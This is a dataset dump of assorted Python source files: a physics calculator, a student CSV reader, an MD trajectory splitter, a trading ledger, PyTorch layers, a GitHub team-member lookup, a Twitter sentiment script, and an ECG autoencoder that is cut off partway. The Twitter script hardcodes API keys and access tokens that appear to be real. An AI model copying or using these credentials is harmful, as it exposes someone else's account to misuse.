below\n\nunits = [\"in\", \"ft\", \"miles\", \"km\", \"m\", \"cm\", \"mm\"]\ntoMeters = [.0254, 0.3048, 1609.34, 1000.0, 1.0, 0.01, 0.001]\n\ntimeunits = [\"s\", \"min\", \"hr\"]\ntoSeconds = [1.0, 60.0, 3600.0]\n\n#print a greeting message to the user below using the included print() function:\nprint(\"Allie Teagle's calculator\")\n\n#\n# MENU\n#\n \nloop = True\nwhile loop:\n print(\" \")\n for i in range(len(units)):\n print(i,\": \",units[i])\n\n print()\n selection = int(input(\"Select length units: \"))\n\n if selection not in range(len(units)):\n print(\"Please enter valid menu options\")\n else:\n loop = False\n\nprint()\n\nloop = True\nwhile loop:\n print(\" \")\n for i in range(len(timeunits)):\n print(i,\": \",timeunits[i])\n\n print()\n timeselection = int(input(\"Select time units: \"))\n\n if timeselection not in range(len(timeunits)):\n print(\"Please enter valid menu options\")\n else:\n loop = False\n\nprint()\n\n# Determine lenth scalar and unit string\nlenscalar = toMeters[selection]\ntimescalar = toSeconds[timeselection]\n \nprint(\"Velocity will be in (\", units[selection], \"/\", timeunits[timeselection], \")\");\n#ask the user for the inputs of launch velocity and angle below. I will do the angle for you:\nangle = float(input(\"What is the projectile's angle of launch: \"))\ninputStr = \"What is the projectile's velocity at launch (\" + units[selection] + \"/\" + timeunits[timeselection] + \"): \"\nvelocity = float(input(inputStr))\n\n\n# Do crappy animation\nWIDTH = 79\noffset = 0\nloop = True\nwhile loop:\n os.system(\"cls\")\n\n if offset > (WIDTH*2/3):\n print(\" \" * offset + \"\\\\\")\n elif offset > (WIDTH/3):\n print(\" \" * offset + \"-\")\n else:\n print(\" \" * offset + \"/\")\n \n \n #move the message a little to the left.\n offset +=1\n #if the entire message has moved 'through' the display then\n #break\n if offset >=WIDTH:\n loop = False\n #take out or change this line to speed up / slow down the display\n time.sleep(0.005)\n\n\n#change the angle from degrees into radians below. I will do this for you:\nangle = radians(angle)\n\n#break up the velocity vector into x and y parts below using sin() and cos():\n\nvelx = (velocity * lenscalar * cos(angle)) / timescalar\nvely = (velocity * lenscalar * sin(angle)) / timescalar\n\n#Find the time in air below:\nt = vely / g * 2\nprint(t)\n#Find the max height below:\nht = t/2\ny = vely * ht - .5 * g * ht**2\n\n#Find the horizontal displacement (call it x) below:\nx = velx * t\n\n#Now report your results back to the user below with print() statements.\n#You may want to use the round() function to round your answers.\nprint(\"--------------------------------------------------------------------\")\nprint(\"The x component of initial velocity is \", velx / lenscalar * timescalar, \" (\", units[selection], \"/\", timeunits[timeselection], \")\")\nprint(\"The y component of initial velocity is \", vely / lenscalar * timescalar, \" (\", units[selection], \"/\", timeunits[timeselection], \")\")\n\nprint(\"Time in air is \", t / timescalar, \" (\", timeunits[timeselection], \")\")\nprint(\"Maximum height is \", y / lenscalar, \" (\", units[selection], \")\")\nprint(\"Horizontal distance is \", x / lenscalar, \" (\", units[selection], \")\")\n\nprint(\"--------------------------------------------------------------------\")\n","sub_path":"Current/Python Examples/physics_projectile_motion.py","file_name":"physics_projectile_motion.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"645213183","text":"import csv\n\n# Copied from http://automatetheboringstuff.com/chapter14/\nexampleFile = open('student_data.csv')\nexampleReader = csv.reader(exampleFile)\nexampleData = list(exampleReader)\n# print(exampleData)\n\nprint('exampleData: ', exampleData)\n\nheader = exampleData[0]\ndata = exampleData[1:]\n\nfor row in data:\n print(row)\n\nprint('header:', header)\n\n# print email addresses\nprint('index = ', header.index('Email Address'))\nemails = []\nfor stud in data:\n # print(stud[header.index('Email Address')])\n emails.append(stud[header.index('Email Address')])\n\nprint(emails)\n\nnetids = []\nfor email in emails:\n netids.append(email.split('@')[0])\n\nprint(netids)\n\nfullnames = []\nfor student in data:\n fullname = student[header.index('First Name')] + \" \" + student[header.index('Last Name')]\n fullnames.append(fullname)\n\nprint(fullnames)\n","sub_path":"tyler/cs301/fall18/materials3/code/lec-12-dicts/read_student_data.py","file_name":"read_student_data.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"146283011","text":"### Splitting individual trajectory into individual blocks according to the cluster index of each frame.\n### Usage: python splitTrajs.py \n### Required packages: mdtraj, msmbuilder, numpy, pickle\n### @Chuankai Zhao, czhao37@illinois.edu\n\nimport mdtraj as md\nimport pickle\nimport numpy as np\n\n### load MD trajectory\ndef loadtraj(trajname):\n traj = md.load(trajname + \".mdcrd\",top=\"ABA_Dimer.prmtop\")\n return traj\n\n### splitting individual trajectory into indidual blocks according to the cluster index of each frame.\ndef savetrajstate(trajname, traj, trajID):\n states = cluster.labels_[trajID]\n frames = np.shape(states)[0]\n stateID = states[0]\n frame = 0\n ID_serial = 0\n ID_Start = 0\n for state in states:\n if frame == frames - 1:\n if state == stateID:\n ID_End = frames\n ID_serial = ID_serial + 1\n tag = trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n ID_Start = frame\n\n if state != stateID:\n ID_End = frame\n ID_serial = ID_serial + 1\n tag = trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n stateID = state\n ID_Start = frame\n if frame == frames - 1:\n ID_End = frames\n ID_serial = ID_serial + 1\n tag = trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n ID_Start = frame\n\n frame = frame + 1\n\n### Main function\nif __name__ == '__main__':\n\n ### Read the list of MD trajectories\n trajlist = \"List\"\n trajnames = [ line.rstrip() for line in open(trajlist, \"r\")]\n\n ### Read the cluster file\n cluster = pickle.load(open(\"clustering_tica.pkl\",\"rb\"))\n\n\n ### For each trajectory, splitting into individual blocks based on the cluster index\n trajID = 0\n for trajname in trajnames:\n traj = loadtraj(trajname)\n savetrajstate(trajname, traj, trajID)\n trajID = trajID + 1\n","sub_path":"03-ExtractStructures/1-ExtractToXTC/splitTrajs.py","file_name":"splitTrajs.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"117652483","text":"import pandas as pd\nimport numpy as np\nfrom copy import copy\nimport datetime\nfrom pprint import pprint\n\n\nclass Ledger:\n\n \"\"\"\n This class allows for the buying and selling of assets,\n primarily now it will assist in determining tax implications of sales.\n\n In the future, it could be used to track environment information in an enhanced way.\n # at any date, we compute everything that did happen after the transactions, assuming that we close things on that day.\n This is a simplification as market orders could take time to fill, but for now this is good.\n\n self.d holds daily buys, sells,and tax implications of each asset used\n self.s holds scalars, and values like holdings of each asset class.\n \"\"\"\n\n def __init__(self, assets, df=None, tax_threshold_days=365):\n self.assets = assets\n self.d = {a: {} for a in assets}\n self.s = {}\n self.tax_threshold_days = tax_threshold_days\n self.dates = []\n\n def date_from_str(self, datestr):\n return pd.to_datetime(datestr, infer_datetime_format=True).date()\n\n def date_to_str(self, date):\n return str(date)\n\n def coerce_date(self, date):\n \"\"\"\n This function takes in a date object of many types and coerces it to a str representation\n \"\"\"\n if isinstance(date, datetime.date):\n date = self.date_to_str(date)\n elif isinstance(date, datetime.datetime):\n date = self.date_to_str(date.date())\n elif isinstance(date, str):\n pass\n else:\n raise Exception(\"unknown date type\")\n assert isinstance(date, str)\n return date\n\n def log_transactions(self, date, transactions, prices):\n \"\"\"\n This function takes in transactions and prices, and computes tax implications of these transactions.\n It returns a dictionary of each asset and the tax implications of sale.\n It also records all of the transactions in self.d\n Args:\n date (str or datetime): Date to log for the transactions\n transactions (list(float)): Transactions corresponding to each asset. TODO: Allow dictionary actions\n prices (list(float)): Price per asset (in order of self.assets)\n returns:\n dict\n keys:\n spend: Amount spent on share purchases\n proceeds: Amount from selling shares\n assets:\n idx: Index of asset in self.assets\n short profit: Profits that are 'short term'. Computed as price-avg cost (could be negative)\n long porift: Profits that are 'long term'. Computed as price--avg cost (could be negative)\n \"\"\"\n date = self.coerce_date(date)\n if date not in self.dates:\n self.dates.append(date)\n # carry over previous values and overwrite them.\n if len(self.dates) == 1:\n self.s[date] = {}\n else:\n self.s[date] = copy(self.s[self.dates[-2]])\n self.s[date][\"transactions\"] = transactions\n self.s[date][\"prices\"] = prices\n tax_d = {\"assets\": {}}\n # compute selling proceeds\n sells = -np.clip(transactions, -np.inf, 0)\n proceeds = np.dot(sells, prices)\n tax_d[\"proceeds\"] = proceeds\n\n # compute buy costs\n buys = np.clip(transactions, 0, np.inf)\n spend = np.dot(buys, prices)\n tax_d[\"spend\"] = spend\n\n for i, (a, t, p) in enumerate(zip(self.assets, transactions, prices)):\n buys, sells = max(0, t), -min(0, t)\n\n self.d[a][date] = {\"buys\": buys, \"sells\": sells, \"price\": p, \"tax_used\": 0}\n if sells > 0: # consider order here\n lots = self.compute_tax_lots(a, sells, date)\n # compute profit/loss of this tax lot\n lots[\"short_profit\"] = (prices[i] - lots[\"short_avg_price\"]) * lots[ # Should this be short_avg - prices????\n \"short_term_shares\"\n ]\n lots[\"long_profit\"] = (prices[i] - lots[\"long_avg_price\"]) * lots[\n \"long_term_shares\"\n ]\n tax_d[\"assets\"][i] = lots\n self._compute_holdings()\n return tax_d\n\n def _compute_holdings(self):\n \"\"\"\n This function looks at assets held, and determines the total assets of each type held\n It also breaks these down by the nature of the asset (long term vs short term)\n\n \"\"\"\n holdings = [0 for _ in self.assets]\n long_term_holdings, short_term_holdings = [0 for _ in self.assets], [\n 0 for _ in self.assets\n ]\n for i, a in enumerate(self.assets):\n before_dates = [\n (\n self.date_from_str(self.current_date)\n - datetime.timedelta(self.tax_threshold_days)\n )\n > self.date_from_str(x)\n for x in self.dates\n ]\n for long_term, d in zip(\n before_dates, [self.date_to_str(x) for x in self.dates]\n ):\n holdings[i] += self.d[a][d][\"buys\"]\n holdings[i] -= self.d[a][d][\"sells\"]\n if long_term:\n long_term_holdings[i] += self.d[a][d][\"buys\"]\n long_term_holdings[i] -= self.d[a][d][\"tax_used\"]\n else:\n short_term_holdings[i] += self.d[a][d][\"buys\"]\n short_term_holdings[i] -= self.d[a][d][\"tax_used\"]\n\n assert min(holdings) >= 0\n self.s[self.current_date][\"holdings\"] = holdings\n self.s[self.current_date][\"long_term_holdings\"] = long_term_holdings\n self.s[self.current_date][\"short_term_holdings\"] = short_term_holdings\n\n def log_scalars(self, date, data: dict):\n \"\"\"\n This function logs scalars for a given date.\n args:\n date (str or datetime): date to log for\n data (dict): Dictionary of keys and values to log into the scalar data structure.\n \"\"\"\n date = self.coerce_date(date)\n if date != self.current_date:\n raise Exception(\"this shouldn't happen\")\n for k, v in data.items():\n self.s[date][k] = v\n\n @property\n def long_term_holdings(self):\n # TODO: if we want long term holdings to be compute for next trading day as opposed to current one\n return self.s[self.current_date][\"long_term_holdings\"]\n\n @property\n def short_term_holdings(self):\n return self.s[self.current_date][\"short_term_holdings\"]\n\n @property\n def holdings(self):\n return self.s[self.current_date][\"holdings\"]\n\n @property\n def current_date(self):\n return self.dates[-1]\n\n @property\n def cash(self):\n if \"cash\" not in self.s[self.current_date]:\n return self.s[self.dates[-2]][\"cash\"]\n else:\n return self.s[self.current_date][\"cash\"]\n\n @property\n def asset_value(self):\n return self.s[self.current_date][\"asset_value\"]\n\n @property\n def total_assets(self):\n return self.s[self.current_date][\"total_assets\"]\n\n @property\n def total_value(self):\n return self.asset_value + self.cash\n\n def compute_tax_lots(self, asset, sells, sell_date):\n a_data = copy(self.d[asset])\n remaining_shares = sells\n long_shares = 0\n long_total_value = 0\n short_shares = 0\n short_total_value = 0\n # need to figure out average cost for long term and short term\n # ok, let's loop here and use up shares oldest to youngest\n dates = sorted(a_data)\n i = 0\n while remaining_shares > 0:\n date = dates[i]\n long_term = (\n self.date_from_str(sell_date)\n - datetime.timedelta(days=self.tax_threshold_days)\n ) > self.date_from_str(date)\n\n d = a_data[date]\n avail_shares = d[\"buys\"] - d[\"tax_used\"]\n\n # account for float imprecision\n if avail_shares < 1e-9:\n avail_shares = 0\n break\n\n if avail_shares > 0:\n # let's consume these\n if avail_shares < remaining_shares:\n shares_consumed = avail_shares\n else:\n shares_consumed = remaining_shares\n\n remaining_shares -= shares_consumed\n if long_term:\n long_shares += shares_consumed\n long_total_value += shares_consumed * d[\"price\"]\n else:\n short_shares += shares_consumed\n short_total_value += shares_consumed * d[\"price\"]\n\n a_data[date][\"tax_used\"] = shares_consumed\n i += 1\n\n self.d[asset] = a_data\n\n def get_avg_price(shares, value):\n if shares == 0:\n return 0\n else:\n return value / shares\n\n return {\n \"asset\": asset,\n \"long_term_shares\": long_shares,\n \"long_avg_price\": get_avg_price(long_shares, long_total_value),\n \"short_term_shares\": short_shares,\n \"short_avg_price\": get_avg_price(short_shares, short_total_value),\n }","sub_path":"finrl/env/accounting/ledger.py","file_name":"ledger.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"539519676","text":"\"\"\"\nBSD 3-Clause License\n\nCopyright (c) Soumith Chintala 2016,\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nCopyright 2020 Huawei Technologies Co., Ltd\n\nLicensed under the BSD 3-Clause License (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttps://spdx.org/licenses/BSD-3-Clause.html\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport torch.nn as nn\nfrom .conv_bn_act import ConvBnAct\nfrom .create_conv2d import create_conv2d\n\n\nclass Involution(nn.Module):\n\n def __init__(\n self,\n channels,\n kernel_size=3,\n stride=1,\n group_size=16,\n rd_ratio=4,\n norm_layer=nn.BatchNorm2d,\n act_layer=nn.ReLU,\n ):\n super(Involution, self).__init__()\n self.kernel_size = kernel_size\n self.stride = stride\n self.channels = channels\n self.group_size = group_size\n self.groups = self.channels // self.group_size\n self.conv1 = ConvBnAct(\n in_channels=channels,\n out_channels=channels // rd_ratio,\n kernel_size=1,\n norm_layer=norm_layer,\n act_layer=act_layer)\n self.conv2 = self.conv = create_conv2d(\n in_channels=channels // rd_ratio,\n out_channels=kernel_size**2 * self.groups,\n kernel_size=1,\n stride=1)\n self.avgpool = nn.AvgPool2d(stride, stride) if stride == 2 else nn.Identity()\n self.unfold = nn.Unfold(kernel_size, 1, (kernel_size-1)//2, stride)\n\n def forward(self, x):\n weight = self.conv2(self.conv1(self.avgpool(x)))\n B, C, H, W = weight.shape\n KK = int(self.kernel_size ** 2)\n weight = weight.view(B, self.groups, KK, H, W).unsqueeze(2)\n out = self.unfold(x).view(B, self.groups, self.group_size, KK, H, W)\n out = (weight * out).sum(dim=3).view(B, self.channels, H, W)\n return out\n","sub_path":"PyTorch/contrib/cv/classification/Vit_small_patch16_224/timm/models/layers/involution.py","file_name":"involution.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"367114655","text":"\n\n#calss header\nclass _PUZZLE():\n\tdef __init__(self,): \n\t\tself.name = \"PUZZLE\"\n\t\tself.definitions = [u'a situation that is difficult to understand: ', u'a game or toy in which you have to fit separate pieces together, or a problem or question that you have to answer by using your skill or knowledge: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_puzzle.py","file_name":"_puzzle.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"143943279","text":"import requests\nimport os\nimport json\n\norganization = \"fuchicorp\"\ntoken = os.environ.get(\"GIT_TOKEN\")\n\n\ndef find_team_id(team_name):\n teams_url= f\"https://api.github.com/orgs/{organization}/teams\"\n resp = requests.get(url=teams_url, headers={\"Authorization\": f\"token {token}\"})\n if resp.status_code == 200:\n for team in resp.json():\n if team['name'].lower() == team_name.lower():\n return team['id']\n else:\n return None\n\ndef is_user_member(username):\n team_id = find_team_id(\"academy-students\")\n if team_id is not None:\n team_url = f\"https://api.github.com/teams/{team_id}/members\"\n resp = requests.get(url=team_url, headers={\"Authorization\": f\"token {token}\"})\n if resp.status_code == 200:\n for user in resp.json():\n if user['login'].lower() == username.lower():\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n print(find_team_id(\"academy-students\"))\n if is_user_member(\"beamsoul\"):\n print(\"Yes this use is in the system\")\n else:\n print(\"This user is not in the list\")","sub_path":"github-management/get-list-of-users.py","file_name":"get-list-of-users.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"393953463","text":"from searchtweets import load_credentials\nfrom searchtweets import collect_results\nfrom searchtweets import gen_rule_payload\n\nfrom textblob import TextBlob\nimport yaml\nimport pandas as pd\nimport re\nimport numpy as np\nimport tweepy\n#from GUI import text\n\ndef rating(avg):\n if avg <= -5:\n return \"Very Bad Movie\"\n elif -5 < avg <= 0:\n return \"Poor Movie\"\n elif 0 < avg <= 5:\n return \"Decent Movie\"\n else:\n return \"Great Movie\"\n\ndef clean_text(text):\n text = re.sub(r'@[A-Za-z0-9]+', '', text) # Removing @ mentions\n text = re.sub(r'#', '', text) # Removing '#'\n text = re.sub(r'RT[\\s]+', '', text) # Removing retweet symbols\n text = re.sub(r'https?:\\/\\/\\S+', '', text) # Removing hyper links\n return text\n\ndef Polarity(text):\n return TextBlob(text).sentiment.polarity\n\nauth = tweepy.OAuthHandler('JUBWToPuyPfmzg8n117ZTllfB', 'lt0Psg46Nqzzaa4uel3wtSbaOyh9WiYIqx6ZH5xaExthndrsc1')\nauth.set_access_token('1172272055183728640-nLQg9fvsLVieB9BXSsJq86a6kMmR8p', '5ogC7PXA1nmlNd5FCYtNaSIhF7tyA5K7CZzNBhi8qIhv1')\n\napi = tweepy.API(auth)\n\ntry:\n api.verify_credentials()\n print(\"Authentication OK\")\n\nexcept:\n print(\"Error during authentication\")\n\nconfig = dict(\n search_tweets_api = dict(\n account_type = 'premium',\n endpoint = 'https://api.twitter.com/1.1/tweets/search/fullarchive/dev.json',\n consumer_key = 'JUBWToPuyPfmzg8n117ZTllfB',\n consumer_secret = 'lt0Psg46Nqzzaa4uel3wtSbaOyh9WiYIqx6ZH5xaExthndrsc1'\n )\n )\n\npremium_search_args = load_credentials(\"twitter_keys_fullarchive.yaml\",\n yaml_key=\"search_tweets_api\",\n env_overwrite=False)\n\n\n#query = \"If this were green KSI\"\nquery = \"Apocalytpo\"\nrule = gen_rule_payload(query, from_date=\"2017-09-01\", to_date=\"2020-07-26\", results_per_call=100)\ntweets = collect_results(rule,\n max_results=100,\n result_stream_args=premium_search_args)\n\n# lists that will become columns in our data frame\nuser_list = []\nclean_list = []\nfavorited_list = []\nretweet_list = []\nits_a_retweet = []\n\nfor tweet in tweets:\n tw_obj = api.get_status(tweet.id)\n if not hasattr(tw_obj, 'retweeted_status'):\n user_list.append(tw_obj.user.screen_name)\n cleaned = clean_text(tweet.text)\n clean_list.append(cleaned)\n favorited_list.append(tweet.favorite_count)\n retweet_list.append(tweet.retweet_count)\n\n# creating the data frame\n# To make a column, you need a list\ndf = pd.DataFrame(user_list)\ndf['Tweet Text'] = clean_list\ndf['Number of Favorites'] = favorited_list\ndf['Number of Retweets'] = retweet_list\ndf['Polarity'] = df['Tweet Text'].apply(Polarity)\n\n# sort data frame by polarity\nsortedDF = df.sort_values(by=['Polarity'], ignore_index=True, ascending=False)\n\n# sort data frame by favorites\nsortedFavDF = df.sort_values(by=['Number of Favorites'], ignore_index=True, ascending=False)\n\n # gathering polarity data from df\npol_count = 0.0\nfor i in df.index:\n pol_count += df['Polarity'][i] * df['Number of Favorites'][i] + df['Polarity'][i] * 2.0 * df['Number of Retweets'][i]\n pol_count += df['Polarity'][i]\n avg_pol = float(pol_count/50.0)\n\nprint(\"Average Polarity: \", avg_pol)\nprint(\"Overall Rating: \", rating(avg_pol), '\\n')\n\n# 5 Most Popular Tweets\nprint(\"5 most popular tweets: \")\nfor i in range(0, 5):\n print(str(i + 1) + \") \" + sortedFavDF['Tweet Text'][i] + \". Number of Favorites: \", sortedFavDF['Number of Favorites'][i])\n\n# 5 Most Positive Tweets\nprint(\"\\n5 Most Positive Tweets: \")\nfor i in range(0, 5):\n print(str(i + 1) + \") \" + sortedDF['Tweet Text'][i] + \". Polarity: \", sortedFavDF['Polarity'][i])\n\nprint(\"\\n5 Most Negative Tweets: \")\nj = 1\nfor i in range(df['Tweet Text'].size, df['Tweet Text'].size - 5, -1):\n print(str(j) + \") \" + sortedDF['Tweet Text'][i - 1] + \". Polarity: \", sortedFavDF['Polarity'][i - 1])\n j += 1\n\n\n\n\n\n\n\n","sub_path":"rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512620769","text":"#41 A - Shrinking\nimport collections \ns = list(input())\ncnt = collections.Counter(s)\nvalcnt = list(cnt.values())\nM = max(valcnt)\n# 出現回数が最多の文字リスト\nmkeys = [i for i,v in cnt.items() if v == M]\n\nans = len(s)\nfor key in s:\n m = 0\n cnt = 0\n # 最多の文字の区間の最大値がその文字の最小値\n for S in s:\n if S == key: \n m = max(m,cnt)\n cnt = 0\n else:\n cnt += 1\n m = max(m,cnt)\n ans = min(ans,m)\nans = min(ans,len(s)//2)\nprint(ans)","sub_path":"Python_codes/p03687/s771482377.py","file_name":"s771482377.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"403540809","text":"from __future__ import print_function\nimport torch\nimport torch.utils.data\nimport numpy as np\nimport wfdb\nimport os\n\nfrom torch import nn, optim\nfrom torch.utils.data.dataset import Dataset\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nis_cuda = True\nepochs_num = 100\nbatch_size = 32\ntorch.manual_seed(46)\nlog_interval = 10\nin_channels_ = 1\nnum_segments_in_record = 100\nsegment_len = 2000\nnum_records = 48\nallow_label_leakage = True\n\ndevice = torch.device(\"cuda:2\" if is_cuda else \"cpu\")\nindex_set = (num_records * num_segments_in_record if allow_label_leakage else num_records)\ntrain_ids, test_ids = train_test_split(np.arange(index_set), train_size=.8, random_state=46)\nscaler = MinMaxScaler(feature_range=(0, 1), copy=False)\n\n\nclass CustomDatasetFromCSV(Dataset):\n def __init__(self, data_path, seg_ids, transforms_=None):\n arr_db = wfdb.get_record_list('mitdb')\n sig_list = []\n seg_ids_internal = []\n if not allow_label_leakage:\n seg_ids_internal = [arr_db[idx] for idx in seg_ids] # get the real id of the record\n for _, record in enumerate(arr_db):\n if (not allow_label_leakage) & (record not in seg_ids_internal): continue\n record_path = os.path.join(data_path, str(record))\n record_signal = wfdb.rdsamp(record_path, sampto=num_segments_in_record * segment_len)[0][:, 0]\n sig_list.append(record_signal.reshape([num_segments_in_record, segment_len]))\n signals = np.vstack(sig_list)\n signals = scaler.fit_transform(signals.T).T.reshape([-1, 1, segment_len])\n if allow_label_leakage:\n signals = signals[seg_ids]\n self.signals = signals\n self.transforms = transforms_\n\n def __getitem__(self, index):\n\n signal = self.signals[index]\n if self.transforms is not None:\n signal = self.transforms(signal)\n\n return signal\n\n def __len__(self):\n return self.signals.shape[0]\n\n\ntrain_dataset = CustomDatasetFromCSV('./data/mit-bih-arrhythmia-database-1.0.0', seg_ids=train_ids)\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=False)\ntest_dataset = CustomDatasetFromCSV('./data/mit-bih-arrhythmia-database-1.0.0', seg_ids=test_ids)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\n\ndef GenerateLR(max_lr, min_lr_ratio, anneal_cycle_pct, tot_num_iter):\n min_lr = max_lr / min_lr_ratio\n half_cyc_len = int((np.floor(100 - anneal_cycle_pct) / 100) * tot_num_iter / 2)\n anneal_len = int(tot_num_iter - 2 * half_cyc_len)\n upVec = np.linspace(min_lr, max_lr, half_cyc_len)\n downVec = np.flip(upVec)\n annealVec = np.flip(np.linspace(min_lr / 100, min_lr, anneal_len))\n cyclic_lr = (upVec.tolist()) + (downVec.tolist()) + (annealVec.tolist())\n return cyclic_lr\n\n\nclass Interpolate(nn.Module):\n def __init__(self, scale_factor=2, mode='nearest'):\n super(Interpolate, self).__init__()\n self.interp = nn.functional.interpolate\n self.scale_factor = scale_factor\n self.mode = mode\n\n def forward(self, x):\n x = self.interp(x, scale_factor=self.scale_factor, mode=self.mode, align_corners=None)\n return x\n\n\nclass Flatten(torch.nn.Module):\n def forward(self, x):\n batch_size = x.shape[0]\n return x.view(batch_size, -1)\n\n\ndef basic_layer(in_channels, out_channels, kernel_size, batch_norm=False, max_pool=True, stride=1, padding=0):\n layer = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding),\n nn.ReLU())\n if batch_norm:\n layer = nn.Sequential(\n layer,\n nn.BatchNorm1d(num_features=out_channels))\n if max_pool:\n layer = nn.Sequential(\n layer,\n nn.MaxPool1d(kernel_size=2, stride=2))\n\n return layer\n\n\ndef basic_layer2(in_channels, out_channels, kernel_size, batch_norm=False, max_pool=True, stride=1, padding=0):\n layer = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding),\n nn.ReLU())\n if batch_norm:\n layer = nn.Sequential(\n layer,\n nn.BatchNorm1d(num_features=out_channels))\n if max_pool:\n layer = nn.Sequential(\n layer,\n nn.MaxPool1d(kernel_size=2, stride=1))\n\n return layer\n\n\nclass CAE(nn.Module):\n def __init__(self, in_channels=in_channels_):\n super(CAE, self).__init__()\n self.encoder = nn.Sequential(\n basic_layer(in_channels=in_channels, out_channels=8, kernel_size=3, batch_norm=False, max_pool=True,\n padding=1),\n basic_layer(in_channels=8, out_channels=32, kernel_size=5, batch_norm=True, max_pool=True, padding=2),\n basic_layer(in_channels=32, out_channels=16, kernel_size=3, batch_norm=True, max_pool=True, padding=1),\n basic_layer(in_channels=16, out_channels=64, kernel_size=11, batch_norm=False, max_pool=False, padding=5),\n basic_layer(in_channels=64, out_channels=128, kernel_size=13, batch_norm=False, max_pool=True, padding=6),\n nn.Dropout(p=.22),\n basic_layer(in_channels=128, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n basic_layer(in_channels=32, out_channels=1, kernel_size=7, batch_norm=False, max_pool=True, padding=3),\n nn.Dropout(p=.22)\n )\n\n self.us_decoder = nn.Sequential(\n basic_layer(in_channels=1, out_channels=1, kernel_size=7, batch_norm=False, max_pool=False, padding=3),\n basic_layer(in_channels=1, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=128, kernel_size=13, batch_norm=False, max_pool=False, padding=6),\n basic_layer(in_channels=128, out_channels=64, kernel_size=11, batch_norm=False, max_pool=False, padding=5),\n\n Interpolate(scale_factor=2),\n basic_layer(in_channels=64, out_channels=16, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n basic_layer(in_channels=16, out_channels=32, kernel_size=5, batch_norm=False, max_pool=False, padding=2),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=8, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Flatten(),\n nn.Linear(in_features=8 * 992, out_features=segment_len),\n 